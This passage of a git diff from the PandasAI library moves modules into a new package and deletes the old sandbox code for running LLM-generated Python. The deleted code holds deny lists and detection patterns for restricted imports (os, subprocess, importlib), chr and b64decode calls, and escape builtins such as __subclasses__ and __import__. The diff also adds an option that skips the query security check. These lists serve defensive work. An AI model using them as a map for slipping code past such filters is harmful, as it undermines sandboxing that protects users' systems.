rename from pandasai/chat/prompts/templates/generate_system_message.tmpl
rename to pandasai/core/prompts/templates/generate_system_message.tmpl
diff --git a/pandasai/chat/prompts/templates/shared/dataframe.tmpl b/pandasai/core/prompts/templates/shared/dataframe.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/shared/dataframe.tmpl
rename to pandasai/core/prompts/templates/shared/dataframe.tmpl
diff --git a/pandasai/chat/prompts/templates/shared/output_type_template.tmpl b/pandasai/core/prompts/templates/shared/output_type_template.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/shared/output_type_template.tmpl
rename to pandasai/core/prompts/templates/shared/output_type_template.tmpl
diff --git a/pandasai/chat/prompts/templates/shared/vectordb_docs.tmpl b/pandasai/core/prompts/templates/shared/vectordb_docs.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/shared/vectordb_docs.tmpl
rename to pandasai/core/prompts/templates/shared/vectordb_docs.tmpl
diff --git a/pandasai/chat/response/__init__.py b/pandasai/core/response/__init__.py
similarity index 100%
rename from pandasai/chat/response/__init__.py
rename to pandasai/core/response/__init__.py
diff --git a/pandasai/chat/response/base.py b/pandasai/core/response/base.py
similarity index 96%
rename from pandasai/chat/response/base.py
rename to pandasai/core/response/base.py
index 76a26491b..d6232019c 100644
--- a/pandasai/chat/response/base.py
+++ b/pandasai/core/response/base.py
@@ -19,6 +19,8 @@ def _generate_response(self, result: dict):
return DataFrame(result)
elif result["type"] == "plot":
return Chart(result)
+ else:
+ raise InvalidOutputValueMismatch(f"Invalid output type: {result['type']}")
def _validate_response(self, result: dict):
if (
diff --git a/pandasai/chat/response/response_types.py b/pandasai/core/response/response_types.py
similarity index 100%
rename from pandasai/chat/response/response_types.py
rename to pandasai/core/response/response_types.py
diff --git a/pandasai/chat/user_query.py b/pandasai/core/user_query.py
similarity index 85%
rename from pandasai/chat/user_query.py
rename to pandasai/core/user_query.py
index 20825f9ae..2dcf3979e 100644
--- a/pandasai/chat/user_query.py
+++ b/pandasai/core/user_query.py
@@ -3,8 +3,10 @@
class UserQuery:
- def __init__(self, user_query: str):
- self._check_malicious_keywords_in_query(user_query)
+ def __init__(self, user_query: str, secure: bool = True):
+ if secure:
+ self._check_malicious_keywords_in_query(user_query)
+
self.value = user_query
def __str__(self):
diff --git a/pandasai/llm/bamboo_llm.py b/pandasai/llm/bamboo_llm.py
index db2420791..0484141e5 100644
--- a/pandasai/llm/bamboo_llm.py
+++ b/pandasai/llm/bamboo_llm.py
@@ -3,7 +3,7 @@
if TYPE_CHECKING:
- from pandasai.chat.prompts.base import BasePrompt
+ from pandasai.core.prompts.base import BasePrompt
from ..helpers.request import Session
from .base import LLM
diff --git a/pandasai/llm/base.py b/pandasai/llm/base.py
index df63c2b27..f65923235 100644
--- a/pandasai/llm/base.py
+++ b/pandasai/llm/base.py
@@ -5,8 +5,8 @@
from abc import abstractmethod
from typing import TYPE_CHECKING, Any, Optional
-from pandasai.chat.prompts.base import BasePrompt
-from pandasai.chat.prompts.generate_system_message import GenerateSystemMessagePrompt
+from pandasai.core.prompts.base import BasePrompt
+from pandasai.core.prompts.generate_system_message import GenerateSystemMessagePrompt
from pandasai.helpers.memory import Memory
from ..exceptions import (
diff --git a/pandasai/llm/fake.py b/pandasai/llm/fake.py
index 84cf47321..abd3c5371 100644
--- a/pandasai/llm/fake.py
+++ b/pandasai/llm/fake.py
@@ -3,7 +3,7 @@
from typing import Optional
from pandasai.agent.state import AgentState
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from .base import LLM
diff --git a/pandasai/pipelines/chat/code_cleaning.py b/pandasai/pipelines/chat/code_cleaning.py
deleted file mode 100644
index 5b7dec6f0..000000000
--- a/pandasai/pipelines/chat/code_cleaning.py
+++ /dev/null
@@ -1,611 +0,0 @@
-import ast
-import copy
-import re
-import traceback
-import uuid
-from typing import Any, List, Union
-
-import astor
-from pandasai.helpers.optional import get_environment
-from pandasai.helpers.path import find_project_root
-from pandasai.helpers.sql import extract_table_names
-
-from ...constants import RESTRICTED_LIBS, WHITELISTED_LIBRARIES
-from ...exceptions import (
- BadImportError,
- ExecuteSQLQueryNotUsed,
- MaliciousQueryError,
-)
-from ...helpers.logger import Logger
-from ...helpers.save_chart import add_save_chart
-from ...schemas.df_config import Config
-from ..base_logic_unit import BaseLogicUnit
-from ..logic_unit_output import LogicUnitOutput
-from ..pipeline_context import PipelineContext
-
-
-class CodeExecutionContext:
- def __init__(
- self,
- prompt_id: uuid.UUID,
- ):
- """
- Code Execution Context
- Args:
- prompt_id (uuid.UUID): Prompt ID
- """
- self.prompt_id = prompt_id
-
-
-class FunctionCallVisitor(ast.NodeVisitor):
- """
- Iterate over the code to find function calls
- """
-
- def __init__(self):
- self.function_calls = []
-
- def visit_Call(self, node):
- if isinstance(node.func, ast.Name):
- self.function_calls.append(node.func.id)
- elif isinstance(node.func, ast.Attribute) and isinstance(
- node.func.value, ast.Name
- ):
- self.function_calls.append(f"{node.func.value.id}.{node.func.attr}")
- self.generic_visit(node)
-
-
-class CodeCleaning(BaseLogicUnit):
- """
- Code Cleaning Stage
- """
-
- _dfs: List
- _config: Union[Config, dict]
- _logger: Logger = None
- _additional_dependencies: List[dict] = []
- _current_code_executed: str = None
-
- def __init__(self, on_failure=None, on_retry=None, **kwargs):
- super().__init__(**kwargs)
- self._function_call_visitor = FunctionCallVisitor()
- self.on_failure = on_failure
- self.on_retry = on_retry
-
- def execute(self, input: Any, **kwargs) -> LogicUnitOutput:
- context: PipelineContext = kwargs.get("context")
- self._dfs = context.dfs
- self._config = context.config
- self._logger = kwargs.get("logger")
-
- code_context = CodeExecutionContext(context.get("last_prompt_id"))
- code_to_run = input
- try:
- code_to_run = self.get_code_to_run(input, code_context)
- except Exception as e:
- traceback_errors = traceback.format_exc()
- if self.on_failure:
- self.on_failure(code_to_run, traceback_errors)
- if self.on_retry:
- return self.on_retry(code_to_run, e)
- raise
-
- context.add("additional_dependencies", self._additional_dependencies)
- context.add("current_code_executed", self._current_code_executed)
-
- return LogicUnitOutput(
- code_to_run,
- True,
- "Code Cleaned Successfully",
- )
-
- def _replace_plot_png(self, code):
- """
- Replace plot.png with temp_chart.png
- Args:
- code (str): Python code to execute
- Returns:
- str: Python code with plot.png replaced with temp_chart.png
- """
- return re.sub(r"""(['"])([^'"]*\.png)\1""", r"\1temp_chart.png\1", code)
-
- def get_code_to_run(self, code: str, context: CodeExecutionContext) -> Any:
- if self._config.security in [
- "standard",
- "advanced",
- ] and self._is_malicious_code(code):
- raise MaliciousQueryError(
- "Code shouldn't use 'os', 'io' or 'chr', 'b64decode' functions as this could lead to malicious code execution."
- )
-
- code = self._replace_plot_png(code)
- self._current_code_executed = code
-
- # Add save chart code
- if self._config.save_charts:
- code = add_save_chart(
- code,
- logger=self._logger,
- file_name=str(context.prompt_id),
- save_charts_path_str=self._config.save_charts_path,
- )
- else:
- # Temporarily save generated chart to display
- code = add_save_chart(
- code,
- logger=self._logger,
- file_name="temp_chart",
- save_charts_path_str=f"{find_project_root()}/exports/charts",
- )
-
- # If plt.show is in the code, remove that line
- code = re.sub(r"plt.show\(\)", "", code)
-
- # Reset used skills
- context.skills_manager.used_skills = []
-
- # Get the code to run removing unsafe imports and df overwrites
- code_to_run = self._clean_code(code, context)
-
- self._logger.log(
- f"""
-Code running:
-```
-{code_to_run}
- ```"""
- )
-
- return code_to_run
-
- def _is_malicious_code(self, code) -> bool:
- tree = ast.parse(code)
-
- # Check for private attributes and access of restricted libs
- def check_restricted_access(node):
- """Check if the node accesses restricted modules or private attributes."""
- if isinstance(node, ast.Attribute):
- attr_chain = []
- while isinstance(node, ast.Attribute):
- if node.attr.startswith("_"):
- raise MaliciousQueryError(
- f"Access to private attribute '{node.attr}' is not allowed."
- )
- attr_chain.insert(0, node.attr)
- node = node.value
- if isinstance(node, ast.Name):
- attr_chain.insert(0, node.id)
- if any(module in RESTRICTED_LIBS for module in attr_chain):
- raise MaliciousQueryError(
- f"Restricted access detected in attribute chain: {'.'.join(attr_chain)}"
- )
-
- elif isinstance(node, ast.Subscript) and isinstance(
- node.value, ast.Attribute
- ):
- check_restricted_access(node.value)
-
- for node in ast.walk(tree):
- # Check 'import ...' statements
- if isinstance(node, ast.Import):
- for alias in node.names:
- sub_module_names = alias.name.split(".")
- if any(module in RESTRICTED_LIBS for module in sub_module_names):
- raise MaliciousQueryError(
- f"Restricted library import detected: {alias.name}"
- )
-
- # Check 'from ... import ...' statements
- elif isinstance(node, ast.ImportFrom):
- sub_module_names = node.module.split(".")
- if any(module in RESTRICTED_LIBS for module in sub_module_names):
- raise MaliciousQueryError(
- f"Restricted library import detected: {node.module}"
- )
- if any(alias.name in RESTRICTED_LIBS for alias in node.names):
- raise MaliciousQueryError(
- "Restricted library import detected in 'from ... import ...'"
- )
-
- # Check attribute access for restricted libraries
- elif isinstance(node, (ast.Attribute, ast.Subscript)):
- check_restricted_access(node)
-
- dangerous_modules = [
- " os",
- " io",
- ".os",
- ".io",
- "'os'",
- "'io'",
- '"os"',
- '"io"',
- "chr(",
- "chr)",
- "chr ",
- "(chr",
- "b64decode",
- ]
-
- return any(
- re.search(r"\b" + re.escape(module) + r"\b", code)
- for module in dangerous_modules
- )
-
- def _is_jailbreak(self, node: ast.stmt) -> bool:
- """
- Remove jailbreaks from the code to prevent malicious code execution.
- Args:
- node (ast.stmt): A code node to be checked.
- Returns (bool):
- """
-
- DANGEROUS_BUILTINS = ["__subclasses__", "__builtins__", "__import__"]
-
- node_str = ast.dump(node)
-
- return any(builtin in node_str for builtin in DANGEROUS_BUILTINS)
-
- def _is_unsafe(self, node: ast.stmt) -> bool:
- """
- Remove unsafe code from the code to prevent malicious code execution.
-
- Args:
- node (ast.stmt): A code node to be checked.
-
- Returns (bool):
- """
-
- code = astor.to_source(node)
- return any(
- (
- method in code
- for method in [
- ".to_csv",
- ".to_excel",
- ".to_json",
- ".to_sql",
- ".to_feather",
- ".to_hdf",
- ".to_parquet",
- ".to_pickle",
- ".to_gbq",
- ".to_stata",
- ".to_records",
- ".to_latex",
- ".to_html",
- ".to_markdown",
- ".to_clipboard",
- ]
- )
- )
-
- def find_function_calls(self, node: ast.AST):
- if isinstance(node, ast.Call):
- if isinstance(node.func, ast.Name):
- self._function_call_visitor.function_calls.append(node.func.id)
- elif isinstance(node.func, ast.Attribute) and isinstance(
- node.func.value, ast.Name
- ):
- self._function_call_visitor.function_calls.append(
- f"{node.func.value.id}.{node.func.attr}"
- )
-
- for child_node in ast.iter_child_nodes(node):
- self.find_function_calls(child_node)
-
- def check_direct_sql_func_def_exists(self, node: ast.AST):
- return (
- self._config.direct_sql
- and isinstance(node, ast.FunctionDef)
- and node.name == "execute_sql_query"
- )
-
- def _replace_table_names(
- self, sql_query: str, table_names: list, allowed_table_names: list
- ):
- regex_patterns = {
- table_name: re.compile(r"\b" + re.escape(table_name) + r"\b")
- for table_name in table_names
- }
- for table_name in table_names:
- if table_name in allowed_table_names.keys():
- quoted_table_name = allowed_table_names[table_name]
- sql_query = regex_patterns[table_name].sub(quoted_table_name, sql_query)
- else:
- raise MaliciousQueryError(
- f"Query uses unauthorized table: {table_name}."
- )
-
- return sql_query
-
- def _clean_sql_query(self, sql_query: str) -> str:
- """
- Clean sql query trim colon and make case-sensitive
- Args:
- sql_query (str): sql query
-
- Returns:
- str: updated sql query
- """
- sql_query = sql_query.rstrip(";")
- table_names = extract_table_names(sql_query)
- allowed_table_names = {df.name: df.name for df in self._dfs} | {
- f'"{df.name}"': df.name for df in self._dfs
- }
- print(allowed_table_names)
- return self._replace_table_names(sql_query, table_names, allowed_table_names)
-
- def _validate_and_make_table_name_case_sensitive(self, node: ast.Assign):
- """
- Validates whether table exists in specified dataset and convert name to case-sensitive
- Args:
- node (ast.Assign): code tree node
-
- Returns:
- node: return updated or same node
- """
- if isinstance(node, ast.Assign):
- # Check if the assigned value is a string constant and the target is 'sql_query'
- if (
- isinstance(node.value, ast.Constant)
- and isinstance(node.value.value, str)
- and isinstance(node.targets[0], ast.Name)
- and node.targets[0].id in ["sql_query", "query"]
- ):
- sql_query = node.value.value
- sql_query = self._clean_sql_query(sql_query)
- node.value.value = sql_query
- elif (
- isinstance(node.value, ast.Call)
- and isinstance(node.value.func, ast.Name)
- and node.value.func.id == "execute_sql_query"
- and len(node.value.args) == 1
- and isinstance(node.value.args[0], ast.Constant)
- and isinstance(node.value.args[0].value, str)
- ):
- sql_query = node.value.args[0].value
- sql_query = self._clean_sql_query(sql_query)
- node.value.args[0].value = sql_query
-
- elif isinstance(node, ast.Expr) and isinstance(node.value, ast.Call):
- # Check if the function call is to 'execute_sql_query' and has a string constant argument
- if (
- isinstance(node.value.func, ast.Name)
- and node.value.func.id == "execute_sql_query"
- and len(node.value.args) == 1
- and isinstance(node.value.args[0], ast.Constant)
- and isinstance(node.value.args[0].value, str)
- ):
- sql_query = node.value.args[0].value
- sql_query = self._clean_sql_query(sql_query)
- node.value.args[0].value = sql_query
-
- return node
-
- def _get_target_names(self, targets):
- target_names = []
- is_slice = False
-
- for target in targets:
- if isinstance(target, ast.Name) or (
- isinstance(target, ast.Subscript) and isinstance(target.value, ast.Name)
- ):
- target_names.append(
- target.id if isinstance(target, ast.Name) else target.value.id
- )
- is_slice = isinstance(target, ast.Subscript)
-
- return target_names, is_slice, target
-
- def _check_is_df_declaration(self, node: ast.AST):
- value = node.value
- return (
- isinstance(value, ast.Call)
- and isinstance(value.func, ast.Attribute)
- and isinstance(value.func.value, ast.Name)
- and hasattr(value.func.value, "id")
- and value.func.value.id == "pd"
- and value.func.attr == "DataFrame"
- )
-
- def _get_originals(self, dfs):
- """
- Get original dfs
-
- Args:
- dfs (list): List of dfs
-
- Returns:
- list: List of dfs
- """
- original_dfs = []
- for df in dfs:
- # TODO - Check why this None check is there
- if df is None:
- original_dfs.append(None)
- continue
- original_dfs.append(df.head())
-
- return original_dfs
-
- def _extract_fix_dataframe_redeclarations(
- self, node: ast.AST, code_lines: list[str]
- ) -> ast.AST:
- """
- Checks if dataframe reclaration in the code like pd.DataFrame({...})
- Args:
- node (ast.AST): Code Node
- code_lines (list[str]): List of code str line by line
-
- Returns:
- ast.AST: Updated Ast Node fixing redeclaration
- """
- if isinstance(node, ast.Assign):
- target_names, is_slice, target = self._get_target_names(node.targets)
-
- if target_names and self._check_is_df_declaration(node):
- # Construct dataframe from node
- code = "\n".join(code_lines)
- env = get_environment(
- self._additional_dependencies,
- secure=self._config.security in ["standard", "advanced"],
- )
- env["dfs"] = copy.deepcopy(self._get_originals(self._dfs))
- exec(code, env)
-
- df_generated = (
- env[target_names[0]][target.slice.value]
- if is_slice
- else env[target_names[0]]
- )
-
- # check if exists in provided dfs
- for index, df in enumerate(self._dfs):
- head = df.get_head()
- if head.shape == df_generated.shape and head.columns.equals(
- df_generated.columns
- ):
- target_var = (
- ast.Subscript(
- value=ast.Name(id=target_names[0], ctx=ast.Load()),
- slice=target.slice,
- ctx=ast.Store(),
- )
- if is_slice
- else ast.Name(id=target_names[0], ctx=ast.Store())
- )
- return ast.Assign(
- targets=[target_var],
- value=ast.Subscript(
- value=ast.Name(id="dfs", ctx=ast.Load()),
- slice=ast.Index(value=ast.Num(n=index)),
- ctx=ast.Load(),
- ),
- )
- return None
-
- def _clean_code(self, code: str, context: CodeExecutionContext) -> str:
- """
- A method to clean the code to prevent malicious code execution.
-
- Args:
- code(str): A python code.
-
- Returns:
- str: A clean code string.
-
- """
-
- # Clear recent optional dependencies
- self._additional_dependencies = []
-
- clean_code_lines = []
-
- tree = ast.parse(code)
-
- # Check for imports and the node where analyze_data is defined
- new_body = []
- execute_sql_query_used = False
-
- # find function calls
- self._function_call_visitor.visit(tree)
-
- for node in tree.body:
- if isinstance(node, (ast.Import, ast.ImportFrom)):
- self._check_imports(node)
- continue
-
- if (
- self._is_df_overwrite(node)
- or self._is_jailbreak(node)
- or self._is_unsafe(node)
- ):
- continue
-
- # if generated code contain execute_sql_query def remove it
- # function already defined
- if self.check_direct_sql_func_def_exists(node):
- continue
-
- # if generated code contain execute_sql_query usage
- if (
- self._config.direct_sql
- and "execute_sql_query" in self._function_call_visitor.function_calls
- ):
- execute_sql_query_used = True
-
- # Sanity for sql query the code should only use allowed tables
- if self._config.direct_sql:
- node = self._validate_and_make_table_name_case_sensitive(node)
-
- self.find_function_calls(node)
-
- clean_code_lines.append(astor.to_source(node))
-
- new_body.append(
- self._extract_fix_dataframe_redeclarations(node, clean_code_lines)
- or node
- )
-
- # Enforcing use of execute_sql_query via Error Prompt Pipeline
- if self._config.direct_sql and not execute_sql_query_used:
- raise ExecuteSQLQueryNotUsed(
- "For Direct SQL set to true, execute_sql_query function must be used. Generating Error Prompt!!!"
- )
-
- new_tree = ast.Module(body=new_body)
- return astor.to_source(new_tree, pretty_source=lambda x: "".join(x)).strip()
-
- def _is_df_overwrite(self, node: ast.stmt) -> bool:
- """
- Remove df declarations from the code to prevent malicious code execution.
-
- Args:
- node (ast.stmt): A code node to be checked.
-
- Returns (bool):
-
- """
-
- return (
- isinstance(node, ast.Assign)
- and isinstance(node.targets[0], ast.Name)
- and node.targets[0].id == "dfs"
- )
-
- def _check_imports(self, node: Union[ast.Import, ast.ImportFrom]):
- """
- Add whitelisted imports to _additional_dependencies.
-
- Args:
- node (object): ast.Import or ast.ImportFrom
-
- Raises:
- BadImportError: If the import is not whitelisted
-
- """
- module = node.names[0].name if isinstance(node, ast.Import) else node.module
- library = module.split(".")[0]
-
- if library == "pandas":
- return
-
- whitelisted_libs = (
- WHITELISTED_LIBRARIES + self._config.custom_whitelisted_dependencies
- )
-
- if library not in whitelisted_libs:
- raise BadImportError(
- f"The library '{library}' is not in the list of whitelisted libraries. "
- "To learn how to whitelist custom dependencies, visit: "
- "https://docs.pandas-ai.com/custom-whitelisted-dependencies#custom-whitelisted-dependencies"
- )
-
- for alias in node.names:
- self._additional_dependencies.append(
- {
- "module": module,
- "name": alias.name,
- "alias": alias.asname or alias.name,
- }
- )
diff --git a/pandasai/pipelines/chat/code_execution.py b/pandasai/pipelines/chat/code_execution.py
deleted file mode 100644
index 1f6120f98..000000000
--- a/pandasai/pipelines/chat/code_execution.py
+++ /dev/null
@@ -1,316 +0,0 @@
-import ast
-import logging
-import traceback
-from typing import Any, Callable, Generator, List, Union
-
-from pandasai.exceptions import InvalidLLMOutputType, InvalidOutputValueMismatch
-from pandasai.pipelines.logic_unit_output import LogicUnitOutput
-from pandasai.responses.response_serializer import ResponseSerializer
-
-from ...exceptions import NoResultFoundError
-from ...helpers.logger import Logger
-from ...helpers.optional import get_environment
-from ...helpers.output_validator import OutputValidator
-from ...schemas.df_config import Config
-from ..base_logic_unit import BaseLogicUnit
-from ..pipeline_context import PipelineContext
-from .code_cleaning import CodeExecutionContext
-
-
-class CodeExecution(BaseLogicUnit):
- """
- Code Execution Stage
- """
-
- _dfs: List
- _config: Union[Config, dict]
- _additional_dependencies: List[dict] = []
- _current_code_executed: str = None
- _retry_if_fail: bool = False
- _ast_comparator_map: dict = {
- ast.Eq: "=",
- ast.NotEq: "!=",
- ast.Lt: "<",
- ast.LtE: "<=",
- ast.Gt: ">",
- ast.GtE: ">=",
- ast.Is: "is",
- ast.IsNot: "is not",
- ast.In: "in",
- ast.NotIn: "not in",
- }
-
- def __init__(
- self,
- on_failure: Callable[[str, Exception], None] = None,
- on_retry: Callable[[str, Exception], None] = None,
- **kwargs,
- ):
- super().__init__(**kwargs)
- self.on_failure = on_failure
- self.on_retry = on_retry
-
- def execute(self, input: Any, **kwargs) -> Any:
- """
- This method will return output according to
- Implementation.
-
- :param input: Your input data.
- :param kwargs: A dictionary of keyword arguments.
- - 'logger' (any): The logger for logging.
- - 'config' (Config): Global configurations for the test
- - 'context' (any): The execution context.
-
- :return: The result of the execution.
- """
- self.context: PipelineContext = kwargs.get("context")
- self._dfs = self.context.dfs
- self._config = self.context.config
- self._additional_dependencies = self.context.get("additional_dependencies", [])
- self._current_code_executed = self.context.get("current_code_executed")
- self.logger: Logger = kwargs.get("logger")
-
- # Execute the code
- code_context = CodeExecutionContext(self.context.get("last_prompt_id"))
-
- retry_count = 0
- code_to_run = input
- result = None
- while retry_count <= self.context.config.max_retries:
- try:
- result = self.execute_code(code_to_run, code_context)
- if self.context.get("output_type") != "" and (
- output_helper := self.context.get("output_type")
- ):
- (validation_ok, validation_errors) = OutputValidator.validate(
- output_helper, result
- )
-
- if not validation_ok:
- raise InvalidLLMOutputType(validation_errors)
-
- if not OutputValidator.validate_result(result):
- raise InvalidOutputValueMismatch(
- f'Value type {type(result["value"])} must match with type {result["type"]}'
- )
-
- break
-
- except Exception as e:
- traceback_errors = traceback.format_exc()
- self.logger.log(f"Failed with error: {traceback_errors}", logging.ERROR)
- if self.on_failure:
- self.on_failure(code_to_run, traceback_errors)
-
- if (
- not self.context.config.use_error_correction_framework
- or retry_count >= self.context.config.max_retries
- ):
- raise e
-
- retry_count += 1
-
- self.logger.log(
- f"Failed to execute code retrying with a correction framework "
- f"[retry number: {retry_count}]",
- level=logging.WARNING,
- )
-
- # TODO - Move this implement to main execute function
- # Temporarily done for test cases this is to be fixed move to the main function
- code_to_run = self._retry_run_code(
- code_to_run, self.context, self.logger, e
- )
-
- return LogicUnitOutput(
- result,
- True,
- "Code Executed Successfully",
- {"content_type": "response", "value": ResponseSerializer.serialize(result)},
- final_track_output=True,
- )
-
- def execute_code(self, code: str, context: CodeExecutionContext) -> Any:
- """
- Execute the python code generated by LLMs to answer the question
- about the input dataframe. Run the code in the current context and return the
- result.
-
- Args:
- code (str): Python code to execute.
- context (CodeExecutionContext): Code Execution Context
- with prompt id.
-
- Returns:
- Any: The result of the code execution. The type of the result depends
- on the generated code.
-
- """
- # List the required dfs, so we can avoid to run the connectors
- # if the code does not need them
- dfs = self._required_dfs(code)
- environment: dict = get_environment(
- self._additional_dependencies,
- secure=self._config.security in ["standard", "advanced"],
- )
- environment["dfs"] = self._get_originals(dfs)
- if len(environment["dfs"]) == 1:
- environment["df"] = environment["dfs"][0]
-
- if self._config.direct_sql:
- environment["execute_sql_query"] = self._dfs[0].execute_sql_query
-
- # Execute the code
- exec(code, environment)
-
- # Get the result
- if "result" not in environment:
- raise NoResultFoundError("No result returned")
-
- return environment["result"]
-
- def _required_dfs(self, code: str) -> List[str]:
- """
- List the index of the DataFrames that are needed to execute the code. The goal
- is to avoid to run the connectors if the code does not need them.
-
- Args:
- code (str): Python code to execute
-
- Returns:
- List[int]: A list of the index of the DataFrames that are needed to execute
- the code.
- """
-
- # Sometimes GPT-3.5/4 use a for loop to iterate over the dfs (even if there is only one)
- # or they concatenate the dfs. In this case we need all the dfs
- if "for df in dfs" in code or "pd.concat(dfs" in code:
- return self._dfs
-
- required_dfs = []
- for i, df in enumerate(self._dfs):
- if f"dfs[{i}]" in code:
- required_dfs.append(df)
- else:
- required_dfs.append(None)
- return required_dfs or self._dfs
-
- # def _get_originals(self, dfs):
- # """
- # Get original dfs
-
- # Args:
- # dfs (list): List of dfs
-
- # Returns:
- # list: List of dfs
- # """
- # original_dfs = []
- # for df in dfs:
- # # TODO - Check why this None check is there
- # if df is None:
- # original_dfs.append(None)
- # continue
-
- # if isinstance(df, pd.DataFrame):
- # original_dfs.append(df)
- # else:
- # # Execute to fetch only if not dataframe
- # df.execute()
- # original_dfs.append(df.pandas_df)
-
- # return original_dfs
-
- def _retry_run_code(
- self,
- code: str,
- context: PipelineContext,
- logger: Logger,
- e: Exception,
- ) -> str:
- """
- A method to retry the code execution with error correction framework.
-
- Args:
- code (str): A python code
- context (PipelineContext) : Pipeline Context
- logger (Logger) : Logger
- e (Exception): An exception
- dataframes
-
- Returns (str): A python code
- """
- if self.on_retry:
- return self.on_retry(code, e)
- else:
- raise e
-
- @staticmethod
- def _tokenize_operand(operand_node: ast.expr) -> Generator[str, None, None]:
- """
- Utility generator function to get subscript slice constants.
-
- Args:
- operand_node (ast.expr):
- The node to be tokenized.
- Yields:
- str: Token string.
-
- Examples:
- >>> code = '''
- ... foo = [1, [2, 3], [[4, 5], [6, 7]]]
- ... print(foo[2][1][0])
- ... '''
- >>> tree = ast.parse(code)
- >>> res = CodeManager._tokenize_operand(tree.body[1].value.args[0])
- >>> print(list(res))
- ['foo', 2, 1, 0]
- """
- if isinstance(operand_node, ast.Call):
- yield operand_node.func.attr
-
- if isinstance(operand_node, ast.Subscript):
- slice_ = operand_node.slice.value
- yield from CodeExecution._tokenize_operand(operand_node.value)
- yield slice_
-
- if isinstance(operand_node, ast.Name):
- yield operand_node.id
-
- if isinstance(operand_node, ast.Constant):
- yield operand_node.value
-
- @staticmethod
- def _get_df_id_by_nearest_assignment(
- current_lineno: int, assignments: list[ast.Assign], target_name: str
- ):
- """
- Utility function to get df label by finding the nearest assignment.
-
- Sort assignment nodes list (copy of the list) by line number.
- Iterate over the assignment nodes list. If the assignment node's value
- looks like `dfs[]` and target label equals to `target_name`,
- set `nearest_assignment` to "dfs[]".
-
- Args:
- current_lineno (int): Number of the current processed line.
- assignments (list[ast.Assign]): List of assignment nodes.
- target_name (str): Name of the target variable. The assignment
- node is supposed to assign to this name.
-
- Returns:
- str: The string representing df label, looks like "dfs[]".
- """
- nearest_assignment = None
- assignments = sorted(assignments, key=lambda node: node.lineno)
- for assignment in assignments:
- if assignment.lineno > current_lineno:
- return nearest_assignment
- try:
- is_subscript = isinstance(assignment.value, ast.Subscript)
- dfs_on_the_right = assignment.value.value.id == "dfs"
- assign_to_target = assignment.targets[0].id == target_name
- if is_subscript and dfs_on_the_right and assign_to_target:
- nearest_assignment = f"dfs[{assignment.value.slice.value}]"
- except AttributeError:
- continue
diff --git a/pandasai/pipelines/chat/validate_pipeline_input.py b/pandasai/pipelines/chat/validate_pipeline_input.py
deleted file mode 100644
index bb197fba0..000000000
--- a/pandasai/pipelines/chat/validate_pipeline_input.py
+++ /dev/null
@@ -1,29 +0,0 @@
-from __future__ import annotations
-from typing import Any
-from pandasai.pipelines.logic_unit_output import LogicUnitOutput
-
-from ..base_logic_unit import BaseLogicUnit
-from ..pipeline_context import PipelineContext
-
-
-class ValidatePipelineInput(BaseLogicUnit):
- """
- Validates pipeline input
- """
-
- pass
-
- def execute(self, input: Any, **kwargs) -> Any:
- """
- This method validates pipeline context and configs
-
- :param input: Your input data.
- :param kwargs: A dictionary of keyword arguments.
- - 'logger' (any): The logger for logging.
- - 'config' (Config): Global configurations for the test
- - 'context' (any): The execution context.
-
- :return: The result of the execution.
- """
- self.context: PipelineContext = kwargs.get("context")
- return LogicUnitOutput(input, True, "Input Validation Successful")
diff --git a/pandasai/safe_libs/base_restricted_module.py b/pandasai/safe_libs/base_restricted_module.py
deleted file mode 100644
index 65e1864bd..000000000
--- a/pandasai/safe_libs/base_restricted_module.py
+++ /dev/null
@@ -1,27 +0,0 @@
-class BaseRestrictedModule:
- def _wrap_function(self, func):
- def wrapper(*args, **kwargs):
- # Check for any suspicious arguments that might be used for importing
- for arg in args + tuple(kwargs.values()):
- if isinstance(arg, str) and any(
- module == arg.lower()
- for module in ["io", "os", "subprocess", "sys", "importlib"]
- ):
- raise SecurityError(
- f"Potential security risk: '{arg}' is not allowed"
- )
- return func(*args, **kwargs)
-
- return wrapper
-
- def _wrap_class(self, cls):
- class WrappedClass(cls):
- def __getattribute__(self, name):
- attr = super().__getattribute__(name)
- return self._wrap_function(self, attr) if callable(attr) else attr
-
- return WrappedClass
-
-
-class SecurityError(Exception):
- pass
diff --git a/pandasai/safe_libs/restricted_base64.py b/pandasai/safe_libs/restricted_base64.py
deleted file mode 100644
index eb305885e..000000000
--- a/pandasai/safe_libs/restricted_base64.py
+++ /dev/null
@@ -1,21 +0,0 @@
-import base64
-
-from .base_restricted_module import BaseRestrictedModule
-
-
-class RestrictedBase64(BaseRestrictedModule):
- def __init__(self):
- self.allowed_functions = [
- "b64encode", # Safe function to encode data into base64
- "b64decode", # Safe function to decode base64 encoded data
- ]
-
- # Bind the allowed functions to the object
- for func in self.allowed_functions:
- if hasattr(base64, func):
- setattr(self, func, self._wrap_function(getattr(base64, func)))
-
- def __getattr__(self, name):
- if name not in self.allowed_functions:
- raise AttributeError(f"'{name}' is not allowed in RestrictedBase64")
- return getattr(base64, name)
diff --git a/pandasai/safe_libs/restricted_datetime.py b/pandasai/safe_libs/restricted_datetime.py
deleted file mode 100644
index 0fc48290a..000000000
--- a/pandasai/safe_libs/restricted_datetime.py
+++ /dev/null
@@ -1,64 +0,0 @@
-import datetime
-
-from .base_restricted_module import BaseRestrictedModule
-
-
-class RestrictedDatetime(BaseRestrictedModule):
- def __init__(self):
- self.allowed_attributes = [
- # Classes
- "date",
- "time",
- "datetime",
- "timedelta",
- "tzinfo",
- "timezone",
- # Constants
- "MINYEAR",
- "MAXYEAR",
- # Time zone constants
- "UTC",
- # Functions
- "now",
- "utcnow",
- "today",
- "fromtimestamp",
- "utcfromtimestamp",
- "fromordinal",
- "combine",
- "strptime",
- # Timedelta operations
- "timedelta",
- # Date operations
- "weekday",
- "isoweekday",
- "isocalendar",
- "isoformat",
- "ctime",
- "strftime",
- "year",
- "month",
- "day",
- "hour",
- "minute",
- "second",
- "microsecond",
- # Time operations
- "replace",
- "tzname",
- "dst",
- "utcoffset",
- # Comparison methods
- "min",
- "max",
- ]
-
- for attr in self.allowed_attributes:
- if hasattr(datetime, attr):
- setattr(self, attr, self._wrap_function(getattr(datetime, attr)))
-
- def __getattr__(self, name):
- if name not in self.allowed_attributes:
- raise AttributeError(f"'{name}' is not allowed in RestrictedDatetime")
-
- return getattr(datetime, name)
diff --git a/pandasai/safe_libs/restricted_json.py b/pandasai/safe_libs/restricted_json.py
deleted file mode 100644
index 7f13b6112..000000000
